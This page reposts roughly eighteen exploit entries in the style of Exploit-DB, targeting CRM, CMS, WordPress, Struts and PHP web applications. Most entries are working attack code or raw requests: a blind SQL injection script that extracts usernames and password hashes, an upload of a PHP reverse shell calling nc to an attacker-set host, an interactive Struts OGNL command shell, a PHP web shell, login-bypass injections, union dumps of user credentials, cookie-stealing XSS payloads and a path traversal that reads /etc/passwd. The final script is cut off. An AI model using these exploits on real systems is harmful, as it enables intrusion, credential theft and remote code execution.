ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
     # Date: 2020-16-09
     # Exploit Author: nag0mez
     # Vendor Homepage: https://ultimatepro.codexcube.com/
     # Version: <= 2.0.5
     # Tested on: Kali Linux 2020.2

     # The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.

     #!/usr/bin/env python3
     #-*- coding: utf-8 -*-

     import requests
     import sys

     # The original vulnerability was found on a server with an invalid SSL certificate,
     # which Python could not verify. I added the verify=False parameter to avoid SSL check.
     # The lack of verification results in a warning message from Python.
     # To get a clean output, we will ignore all warnings.
     import warnings
     warnings.filterwarnings("ignore")

     host = 'https://testurl.test' # Change
     url = "{}/frontend/get_article_suggestion/".format(host)
     chars = '1234567890abcdefghijklmnopqrstuvwxyz'
     hex_chars = 'abcdef1234567890'

     def send_payload(payload):
         try:
             response = requests.post(url, data=payload, verify=False)
             content = response.text
             length = len(content)
             return length
         except Exception as e:
             print('Cannot connect to host. Exit.')
             sys.exit(1)

     def get_first_user():
         found = True
         known = ''
         while found:
             found = False
             for c in chars:
                 test = known + c
                 payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
                 length = send_payload(payload)
                 if length > 2:
                     found = True
                     known += c
                     print(c, end='')
                     sys.stdout.flush()
                     break
         return known

     def get_hash(username):
         found = True
         known = ''
         while found:
             found = False
             for c in hex_chars:
                 test = known + c
                 payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
                 length = send_payload(payload)
                 if length > 2:
                     found = True
                     known += c
                     print(c, end='')
                     sys.stdout.flush()
                     break
         return known

     if __name__ == '__main__':
         print('Exploit started.')
         print('Guessing username...')
         username = get_first_user()
         if username != '':
             print('\nUsername found: {}'.format(username))
         else:
             print('\nCould not get username! Exit.')
             sys.exit(1)
         print('Guessing password SHA512 hash...')
         sha = get_hash(username)
         if sha != '':
             print('\nHash found: {}'.format(sha))
         else:
             print('\nCould not get Hash! Exit.')
             sys.exit(1)
  2. # Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS
     # Google Dork: N/A
     # Date: 2020-08-07
     # Exploit Author: yusufmalikul
     # Vendor Homepage: https://phpgurukul.com
     # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
     # Version: 2.1
     # Tested on: Windows 10
     # CVE : N/A

     Description
     The User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to Persistent XSS via the fname, lname, email, and contact fields when a user registers on the site; the payload is triggered when the admin views the user list on the manage user page.

     POC

     User side
     1. Go to the user registration page http://localhost/loginsystem
     2. Enter <img src="x" onerror=alert(document.cookie)> in one of the fields (first name, last name, email, or contact)
     3. Click sign up

     Admin side
     1. Login to admin panel http://localhost/loginsystem/admin
     2. After a successful login it will redirect to the manage user page
     3. Payload triggered
  3. # Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass
     # Exploit Author: Moaaz Taha (0xStorm)
     # Date: 2020-09-08
     # Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14412&title=Mobile+Shop+System+in+PHP+MySQL
     # Version: 1.0
     # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

     # POC
     1- Go to "http://TARGET/mobileshop-master/login.php" or "http://TARGET/mobileshop-master/LoginAsAdmin.php"
     2- Inject this SQL payload (test' or 1=1 -- -) in email field and any password in password field.
     3- Click on "login", then you will bypass the authentication successfully.

     # Malicious HTTP POST Requests

     POST /mobileshop-master/login.php HTTP/1.1
     Host: 192.168.1.55:8888
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://192.168.1.55:8888/mobileshop-master/login.php
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 44
     Connection: close
     Upgrade-Insecure-Requests: 1

     email=test%27+or+1%3D1+--+-&password=test123

     ==========================================================================

     POST /mobileshop-master/LoginAsAdmin.php HTTP/1.1
     Host: 192.168.1.55:8888
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://192.168.1.55:8888/mobileshop-master/LoginAsAdmin.php
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 44
     Connection: close
     Cookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6
     Upgrade-Insecure-Requests: 1

     email=test%27+or+1%3D1+--+-&password=test123
  4. # Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
     # Date: 2020-07-03
     # Exploit Author: H0j3n
     # Vendor Homepage: http://ritecms.com/
     # Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download
     # Version: 2.2.1
     # Tested on: Linux
     # Reference: https://www.exploit-db.com/exploits/48636

     #!/usr/bin/python
     # coding=utf-8

     import requests,sys,base64,os
     from colorama import Fore, Back, Style
     from requests_toolbelt.multipart.encoder import MultipartEncoder
     requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

     # Variable
     CONTENT = '''<form action="index.php" method="post">'''

     # Header
     def header():
         top = cyan('''
     \t _____ _ _ _____ __ __ _____
     \t| __ \(_) | / ____| \/ |/ ____|
     \t| |__) |_| |_ ___| | | \ / | (___ ___ ___ ___
     \t| _ /| | __/ _ \ | | |\/| |\___ \ _ __ |_ | |_ | < /
     \t| | \ \| | || __/ |____| | | |____) | | |/ / / __/_ / __/_ / /
     \t|_| \_\_|\__\___|\_____|_| |_|_____/ |___/ /____(_)____(_)_/
     ''')
         return top

     def info():
         top = cyan('''
     [+] IP : {0}
     [+] USERNAME : {1}
     [+] PASSWORD : {2}
     '''.format(IP,USER,PASS))
         return top

     # Request Function
     # Color Function
     def cyan(STRING):
         return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET

     def red(STRING):
         return Style.BRIGHT+Fore.RED+STRING+Fore.RESET

     # Main
     if __name__ == "__main__":
         print header()
         print "\t--------------------------------------------------------------"
         print "\t| RiteCMS v2.2.1 - Authenticated Remote Code Execution |"
         print "\t--------------------------------------------------------------"
         print "\t| Reference : https://www.exploit-db.com/exploits/48636 |"
         print "\t| By : H0j3n |"
         print "\t--------------------------------------------------------------"
         if len(sys.argv) == 1:
             print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
             print cyan("\n[-] Please Put IP & Credentials")
             sys.exit(-1)
         if len(sys.argv) == 2:
             print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
             print cyan("\n[-] Please Put Credentials")
             sys.exit(-1)
         if len(sys.argv) > 3:
             print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
             print cyan("\n[-] Only 2 arguments needed please see the usage!")
             sys.exit(-1)

         IP = sys.argv[1]
         USER,PASS = sys.argv[2].split(":")
         print info()

         URL='{0}/cms/index.php'.format(IP)
         URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media'
         HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}
         LOG_INFO = {"username" : USER, "userpw" : PASS}

         try:
             with requests.Session() as SESSION:
                 SESSION.get(URL)
                 SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False)
         except:
             print red("[-] Check the URL!")
             sys.exit(-1)

         if CONTENT in str(SESSION.get(URL_UPLOAD).text):
             print red("[-] Cannot Login!")
             sys.exit(-1)
         else:
             print cyan("[+] Credentials Working!")

         LHOST = str(raw_input("Enter LHOST : "))
         LPORT = str(raw_input("Enter LPORT : "))
         FILENAME = str(raw_input("Enter FileName (include.php) : "))
         PAYLOAD = "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f'); ?>".format(LHOST,LPORT)

         FORM_DATA = {
             'mode': (None,'filemanager'),
             'file': (FILENAME, PAYLOAD),
             'directory': (None, 'media'),
             'file_name': (None, ''),
             'upload_mode': (None, '1'),
             'resize_xy': (None, 'x'),
             'resize': (None, '640'),
             'compression': (None, '80'),
             'thumbnail_resize_xy': (None, 'x'),
             'thumbnail_resize': (None, '150'),
             'thumbnail_compression': (None, '70'),
             'upload_file_submit': (None, 'OK - Upload file')
         }
         HEADER_UPLOAD = {
             'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
             'Accept-Language': 'en-US,en;q=0.5',
             'Accept-Encoding': 'gzip, deflate',
             'Referer': URL_UPLOAD
         }

         response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD)
         if FILENAME in response.text:
             print cyan("\n[+] File uploaded and can be found!")
         else:
             print red("[-] File cannot be found or use different file name!")
             sys.exit(-1)

         URL_GET = IP + '/media/{0}'.format(FILENAME)
         OPTIONS = str(raw_input("Exploit Now (y/n)?"))
         print cyan("\nW0rk1ng!!! Enjoy :)")
         SESSION.get(URL_GET)
  5. # Exploit Title: WordPress Rest Google Maps Plugin SQL Injection
     # Google Dork: inurl:index.php?rest_route=/wpgmza/
     # Date: 2020-09-09
     # Exploit Author: Jonatas Fil
     # Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers
     # Software Link: https://wordpress.org/plugins/wp-google-maps/
     # Version: < 7.11.18
     # Tested on: Linux
     # CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10692)

     #!/bin/bash
     TARGET="192.168.1.77"
     curl -k --silent "http://$TARGET/index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%7D&fields=*+from+wp_users+--+-" | jq
  6. # Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated)
     # Date: 10.8.2020.
     # Exploit Author: n1x_ [MS-WEB]
     # Software Homepage: https://wordpress.org/plugins/wp-colorbox/
     # Software Link (v1.1.1): https://downloads.wordpress.org/plugin/wp-colorbox.1.1.1.zip
     # Product Version: 1.1.1

     [Description]
     # WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library.
     # Due to improper input sanitization of the "hyperlink" field of the plugin shortcode, version v1.1.1 (and possibly previous versions) is affected by a stored XSS vulnerability.

     [Proof of Concept]
     # 1. Authorization as user with privileges to write and publish posts
     # 2. Injecting code into "hyperlink" field of the plugin shortcode, and publishing the post
     # 3. The code is stored on the post

     [Example payloads]
     # Example payload 1:
     [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert(document.cookie)</script>"]
     # Example payload 2:
     [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert('sampletext')</script>"]

     [Response]
     ...
     <a class="wp-colorbox-youtube" href="http://www.youtube.com/embed/example"><script>alert('sampletext')</script></a>
     ...
  7. # Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
     # Google Dork: ext:action | filetype:action
     # Date: 2020/09/09
     # Exploit Author: Jonatas Fil
     # Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html
     # Version: <= 2.3.15
     # Tested on: Linux
     # CVE : CVE-2013-2251

     #!/usr/bin/python
     #
     # coding=utf-8
     #
     # Struts 2 DefaultActionMapper Exploit [S2-016]
     # Interactive Shell for CVE-2013-2251
     #
     # The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with
     # "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with
     # attaching navigational information to buttons within forms.
     #
     # https://struts.apache.org/docs/s2-016.html
     # Jonatas Fil (@exploitation)

     import requests
     import sys
     import readline

     # Disable SSL
     requests.packages.urllib3.disable_warnings()

     # ShellEvil
     if len(sys.argv) == 2:
         target = sys.argv[1]
         # Payload
         first = target + "?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','"
         second = "'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
         loop = 1
         while loop == 1:
             cmd = raw_input("$ ")
             while cmd.strip() == '':
                 cmd = raw_input("$ ")
             if cmd.strip() == '\q':
                 print("Exiting...")
                 sys.exit()
             try:
                 headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"}
                 pwn=requests.get(first+cmd+second,headers = headers,verify=False) # Disable SSL
                 if pwn.status_code == 200:
                     print pwn.content # 1337
                 else:
                     print("Not Vuln !")
                     sys.exit()
             except Exception,e:
                 print e
                 print("Exiting...")
                 sys.exit()
     else:
         # BANNER
         print('''
      __ _ _ _ __ _ _
     / _\ |__ ___| | | /__\_ _(_) |
     \ \| '_ \ / _ \ | |/_\ \ \ / / | |
     _\ \ | | | __/ | //__ \ V /| | |
     \__/_| |_|\___|_|_\__/ \_/ |_|_|
     by Jonatas Fil [@explotation]
     ''')
         print("======================================================")
         print("# Struts 2 DefaultActionMapper Exploit [S2-016] #")
         print("# USO: python struts.py http://site.com:8080/xxx.action #")
         print("======================================================")
         print("bye")
         sys.exit()
  8. # Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting
     # Date: 21/10/2020
     # Exploit Author: Jyotsna Adhana
     # Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
     # Version: 1.0
     # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

     Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
     Step 2: use payload <script>alert(document.cookie)</script> in Course and Description field

     Malicious Request

     POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     X-Requested-With: XMLHttpRequest
     Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793
     Content-Length: 478
     Origin: http://localhost
     Connection: close
     Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
     Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re

     -----------------------------168636252127671582243354784793
     Content-Disposition: form-data; name="id"


     -----------------------------168636252127671582243354784793
     Content-Disposition: form-data; name="course"

     <script>alert(document.cookie)</script>
     -----------------------------168636252127671582243354784793
     Content-Disposition: form-data; name="description"

     <script>alert(document.cookie)</script>
     -----------------------------168636252127671582243354784793--

     Step 3: Cookie will be reflected each time someone visits the Course List section.
  9. # Exploit Title: Hrsale 2.0.0 - Local File Inclusion
     # Date: 10/21/2020
     # Exploit Author: Sosecure
     # Vendor Homepage: https://hrsale.com/index.php
     # Version: version 2.0.0

     Description: This exploit allows you to download any readable file from the server without permission or a login session.

     Payload : https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd

     POC:
     1. Access the HRsale application and browse to the download path with the payload
     2. Get /etc/passwd
  10. # Exploit Title: School Faculty Scheduling System 1.0 - Authentication Bypass
      # Date: 21/10/2020
      # Exploit Author: Jyotsna Adhana
      # Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
      # Version: 1.0
      # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

      Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin
      Step 2: use payload jyot' or 1=1# in user and password field

      Malicious Request

      POST /schoolFSS/scheduling/admin/ajax.php?action=login HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 55
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/schoolFSS/scheduling/admin/login.php
      Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re

      username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23

      Step 3: You will be logged in as admin.
  11. # Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Product Name)
      # Exploit Author: Adeeb Shah (@hyd3sec)
      # Date: August 2, 2020
      # Vendor Homepage: https://www.sourcecodester.com/
      # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
      # Version: 1.0
      # Tested On: Windows 10 (x64_86) + XAMPP 7.4.4

      # Vulnerability Details
      # Description
      A persistent cross-site scripting vulnerability exists within the 'Product Name' parameter in the Edit Product function.
      # This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Product Name value expected.

      #Steps:
      1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
      2. Click "Product"
      3. Click "Action" in any categories name row
      4. Click Edit, then Product Info (tab)
      5. In "Product Name" field enter XSS <script>alert("XSS")</script>
      6. Click save changes
      7. Any page on the webapp expecting that 'Product Name' will trigger the XSS.

      POST /stock/php_action/editProduct.php HTTP/1.1
      Host: 192.168.222.132
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept: application/json, text/javascript, */*; q=0.01
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.222.132/stock/product.php
      X-Requested-With: XMLHttpRequest
      Content-Type: multipart/form-data; boundary=---------------------------147762840819880874581057152477
      Content-Length: 938
      DNT: 1
      Connection: close
      Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8

      -----------------------------147762840819880874581057152477
      Content-Disposition: form-data; name="editProductName"

      <script>alert("hyd3sec")</script>
      -----------------------------147762840819880874581057152477
      Content-Disposition: form-data; name="editQuantity"

      9
      -----------------------------147762840819880874581057152477
      Content-Disposition: form-data; name="editRate"

      1200
      -----------------------------147762840819880874581057152477
      Content-Disposition: form-data; name="editBrandName"

      12
      -----------------------------147762840819880874581057152477
      Content-Disposition: form-data; name="editCategoryName"

      7
      -----------------------------147762840819880874581057152477
      Content-Disposition: form-data; name="editProductStatus"

      1
      -----------------------------147762840819880874581057152477
      Content-Disposition: form-data; name="productId"

      8
      -----------------------------147762840819880874581057152477--
  12. # Exploit Title: GOautodial 4.0 - Authenticated Shell Upload
      # Author: Balzabu
      # Discovery Date: 07-23-2020
      # Vendor Homepage: https://goautodial.org/
      # Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
      # Tested Version: 4.0 (Last release as of today)
      # Tested on OS: CentOS 7

      # STEPS TO REPRODUCE:
      1 - Log in as an agent
      2 - Write a new message to user goadmin with random subject and text
      3 - Attach your webshell to the message
      4 - Access your shell at https://www.foo.com/uploads/year/month/shellname.php ( Example: https://XXX.XXX.XXX.XXX/uploads/2020/07/shell.php )
      5 - Priv esc and enjoy ... :-)
  13. # Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Categories Name)
      # Exploit Author: Adeeb Shah (@hyd3sec)
      # Date: August 2, 2020
      # Vendor Homepage: https://www.sourcecodester.com/
      # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
      # Version: 1.0
      # Tested On: Windows 10 (x64_86) + XAMPP 7.4.4

      # Vulnerability Details
      # Description
      A persistent cross-site scripting vulnerability exists within the 'Categories Name' parameter in the edit brand function.
      # This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Categories Name value expected.

      #Steps:
      1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
      2. Click "Category"
      3. Click "Action" in any categories name row
      4. Click Edit
      5. In "Categories Name" field enter XSS <script>alert("XSS")</script>
      6. Click save changes
      7. Any page on the webapp expecting that 'Categories Name' will trigger the XSS.

      POST /stock/php_action/editCategories.php HTTP/1.1
      Host: 192.168.222.132
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept: application/json, text/javascript, */*; q=0.01
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.222.132/stock/categories.php
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 102
      DNT: 1
      Connection: close
      Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8

      editCategoriesName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editCategoriesStatus=1&editCategoriesId=9
  14. # Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Brand Name)
      # Exploit Author: Adeeb Shah (@hyd3sec)
      # Date: August 2, 2020
      # Vendor Homepage: https://www.sourcecodester.com/
      # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
      # Version: 1.0
      # Tested On: Windows 10 (x64_86) + XAMPP 7.4.4

      # Vulnerability Details
      # Description
      A persistent cross-site scripting vulnerability exists within the 'Brand Name' parameter in the edit brand function.
      # This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Brand Name value expected.

      #Steps:
      1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
      2. Click "Brand"
      3. Click "Action" in any brand name row
      4. Click Edit
      5. In "Brand Name" field enter XSS <script>alert(1)</script>
      6. Click save changes
      7. Any page on the webapp expecting that 'Brand Name' will trigger the XSS.

      POST /stock/php_action/editBrand.php HTTP/1.1
      Host: 192.168.222.132
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept: application/json, text/javascript, */*; q=0.01
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.222.132/stock/brand.php
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 78
      DNT: 1
      Connection: close
      Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8

      editBrandName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editBrandStatus=1&brandId=14
  15. # Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
      # Date: 01.08.2020 (1st August 2020)
      # Exploit Author: Maximilian Barz aka. Silky
      # Vendor Homepage: tiki.org
      # Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
      # Version: 21.1
      # Tested on: Kali Linux 5.7.0-kali1-amd64

      #!/usr/bin/env python3
      import requests
      import json
      import lxml.html
      import sys

      banner = '''
      Proof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
      '''

      def main():
          if(len(sys.argv) < 2):
              print(banner)
              print("Usage: %s <host> " % sys.argv[0])
              print("Eg: %s 1.2.3.4 " % sys.argv[0])
              return
          rhost = sys.argv[1]
          url = "http://"+rhost+"/tiki/tiki-login.php"
          session = requests.Session()

          def get_ticket():
              r = requests.get(url)
              login_page = r.text.encode('utf-8')
              html = lxml.html.fromstring(login_page)
              auth = html.xpath('//input[@name="ticket"]/@value')
              return str(auth)[2:-2]

          def get_cookie():
              session.get(url)
              return session.cookies.get_dict()

          cookie = get_cookie()
          ticket = get_ticket()
          payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'}
          headers = {
              'Host': rhost,
              'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
              'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
              'Accept-Language': 'en-US,en;q=0.5',
              'Accept-Encoding': 'gzip, deflate',
              'Referer': 'http://'+rhost+'/tiki/tiki-login.php',
              'Content-Type': 'application/x-www-form-urlencoded',
              'Content-Length': '125',
              'Connection': 'close',
              'Upgrade-Insecure-Requests': '1',
              'Cache-Control': 'max-age=0',
          }
          for i in range(60):
              r = session.post(url, payload, headers)
              if("Account requires administrator approval." in r.text):
                  print("Admin Password got removed.")
                  print("Use BurpSuite to login into admin without a password ")

      if(__name__ == '__main__'):
          main()
  16. # Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload
      # Date: 22-10-2020
      # Exploit Author: Jyotsna Adhana
      # Vendor Homepage: https://www.sourcecodester.com/php/14545/online-library-management-system-phpmysqli-full-source-code-2020.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=14545&title=Online+Library+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code+%282020%29
      # Version: 1.0
      # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

      #Vulnerable Page: http://localhost/librarysystem/admin/borrower/index.php?view=add

      #Exploit
      Fill details
      Create php shell code with below script

      <?php
      if(isset($_REQUEST['cmd'])){
          echo "<pre>";
          $cmd = ($_REQUEST['cmd']);
          system($cmd);
          echo "</pre>";
          die;
      }?>

      Click on Browse
      Select php file
      Click Save
      Access below URL:
      http://localhost/librarysystem/admin/borrower/photos/23102020080814backdoor.php?cmd=dir
      add system commands after cmd to execute it.
  17. # Exploit Title: Stock Management System 1.0 - SQL Injection
      # Dork: N/A
      # Date: 2020-10-22
      # Exploit Author: Ihsan Sencan
      # Vendor Homepage: https://www.sourcecodester.com/
      # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
      # Version: 1.0
      # Tested on: Linux
      # CVE: N/A

      # POC:
      # 1)
      # fetchSelectedBrand.php
      # $brandId = $_POST['brandId'];
      #     $sql = "SELECT brand_id, brand_name, brand_active, brand_status FROM brands WHERE brand_id = $brandId";
      #
      curl -i -s -k -X $'POST' \
          -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 170' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
          -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
          --data-binary $'brandId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
          $'http://localhost/ExploitDb/stock/php_action/fetchSelectedBrand.php'
      #
      # POC:
      # 2)
      # fetchSelectedCategories.php
      # $categoriesId = $_POST['categoriesId'];
      #     $sql = "SELECT categories_id, categories_name, categories_active, categories_status FROM categories WHERE categories_id = $categoriesId";
      #
      curl -i -s -k -X $'POST' \
          -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 175' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
          -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
          --data-binary $'categoriesId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
          $'http://localhost/ExploitDb/stock/php_action/fetchSelectedCategories.php'
      #
      # ++
      #
  18. #!/usr/bin/python3
      import requests
      import sys
      import warnings
      from bs4 import BeautifulSoup
      import json

      warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

      if len(sys.argv) < 6:
          print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
          exit()

      url = sys.argv[1]
      username = sys.argv[2]
      password = sys.argv[3]
      ip = sys.argv[4]
      port = sys.argv[5]

      req = requests.session()
      login_creds = { "username":username, "password":password, "mode":"normal"}

      print("[+] Sending login request...")
      login = req.post(url+"/api/core/auth", json = login_creds)

      if username in login.text:
          page = url + "/api/terminal/create"
